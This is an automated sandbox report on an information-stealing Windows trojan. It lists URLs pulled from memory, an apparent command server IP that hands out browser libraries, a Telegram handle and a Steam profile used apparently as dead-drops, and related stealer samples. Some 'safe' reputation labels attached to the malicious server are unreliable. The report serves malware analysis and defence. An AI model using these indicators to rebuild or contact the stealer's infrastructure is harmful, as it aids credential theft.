                    https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpERegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://65.109.242.59/mozglue.dllkRegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://t.me/copterwinfile.exe, 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.mozilla.com/en-US/blocklist/RegAsm.exe, RegAsm.exe, 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/mRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://mozilla.org0/nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiDHDHCG.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/points/shop/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.jsRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=IJECAE.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPKRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&ampRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ecosia.org/newtab/IJECAE.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brHCAEBF.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://65.109.242.59JDGCRegAsm.exe, 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYtHCAEBF.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/~fRctRegAsm.exe, 00000001.00000002.2526755030.0000000001132000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaRegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/about/76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/headeRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://help.steampowered.com/en/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/market/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/news/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englisRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=IJECAE.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgRegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/discussions/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/stats/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&ampRegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchIJECAE.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/workshop/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://65.109.242.59GIDARegAsm.exe, 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/profiles/76561199689717899/badgesRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/legal/RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sqlite.org/copyright.html.RegAsm.exe, 00000001.00000002.2534193240.000000001925D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://65.109.242.5976561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=englRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/profiles/76561199689717899/inventory/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=enRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoIJECAE.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.RegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&amRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOITRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engliRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_RegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&ampRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=IJECAE.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engliRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3RegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://store.steampowered.com/account/cookiepreferences/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/mobileRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.mozilla.orgHCAEBF.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/76561199689717899[1].htm.1.drtrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=IJECAE.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/login/hoRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    104.102.42.29
                    		steamcommunity.comUnited States
                    		16625AKAMAI-ASUStrue
                    65.109.242.59
                    		unknownUnited States
                    		11022ALABANZA-BALTUSfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1447265
                    Start date and time:2024-05-24 17:46:04 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 24s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:12
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@8/27@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 94
                    • Number of non-executed functions: 236
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    11:47:03API Interceptor1x Sleep call for process: RegAsm.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.102.42.29BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                      file.exeGet hashmaliciousVidarBrowse
                        https://steamcommunnittly.com/gift/activation/feor37565hFh6dseGet hashmaliciousUnknownBrowse
                          5C8BGNPCno.exeGet hashmaliciousCryptOne, VidarBrowse
                            file.exeGet hashmaliciousVidarBrowse
                              file.exeGet hashmaliciousVidarBrowse
                                3108_FreeDownloadFiles.zipGet hashmaliciousPureLog Stealer, VidarBrowse
                                  file.exeGet hashmaliciousVidarBrowse
                                    file.exeGet hashmaliciousVidarBrowse
                                      file.exeGet hashmaliciousVidarBrowse
                                        65.109.242.59SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          steamcommunity.comSecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                          • 23.67.133.187
                                          SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                          • 23.199.218.33
                                          BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                          • 104.102.42.29
                                          file.exeGet hashmaliciousVidarBrowse
                                          • 104.102.42.29
                                          https://steamcommunnittly.com/gift/activation/feor37565hFh6dseGet hashmaliciousUnknownBrowse
                                          • 104.102.42.29
                                          dfzesJIgdr.exeGet hashmaliciousRedLine, VidarBrowse
                                          • 23.197.127.21
                                          http://steamcommunici.com/profiles/76567410475250301Get hashmaliciousUnknownBrowse
                                          • 92.122.104.90
                                          file.exeGet hashmaliciousVidarBrowse
                                          • 23.197.127.21
                                          SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exeGet hashmaliciousCryptOne, VidarBrowse
                                          • 23.197.127.21
                                          a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                          • 23.195.238.96

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ALABANZA-BALTUSSecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                          • 65.109.242.59
                                          bogotune_bdbGet hashmaliciousUnknownBrowse
                                          • 64.176.196.183
                                          aspellGet hashmaliciousUnknownBrowse
                                          • 64.176.196.183
                                          SecuriteInfo.com.W32.MSIL_Kryptik.KZR.gen.Eldorado.14377.22773.exeGet hashmaliciousAgentTeslaBrowse
                                          • 65.109.115.215
                                          TYxryaQOKO.elfGet hashmaliciousMiraiBrowse
                                          • 216.147.52.145
                                          dfzesJIgdr.exeGet hashmaliciousRedLine, VidarBrowse
                                          • 65.108.55.55
                                          file.exeGet hashmaliciousVidarBrowse
                                          • 65.108.55.55
                                          file.exeGet hashmaliciousVidarBrowse
                                          • 65.108.55.55
                                          3108_FreeDownloadFiles.zipGet hashmaliciousPureLog Stealer, VidarBrowse
                                          • 65.108.55.55
                                          file.exeGet hashmaliciousVidarBrowse
                                          • 65.108.55.55
                                          AKAMAI-ASUSQuarantined Messages(1).zipGet hashmaliciousHTMLPhisherBrowse
                                          • 23.50.131.146
                                          https://www.brownfieldagnews.com/news/Get hashmaliciousUnknownBrowse
                                          • 23.208.148.134
                                          SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                          • 23.199.218.33
                                          BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                          • 104.102.42.29
                                          Job Description (LM HR Division II).pdf .scr.exeGet hashmaliciousUnknownBrowse
                                          • 23.47.168.24
                                          https://deref-mail.com/mail/client/j_iGygdK9BI/dereferrer/?redirectUrl=Get hashmaliciousUnknownBrowse
                                          • 23.212.88.20
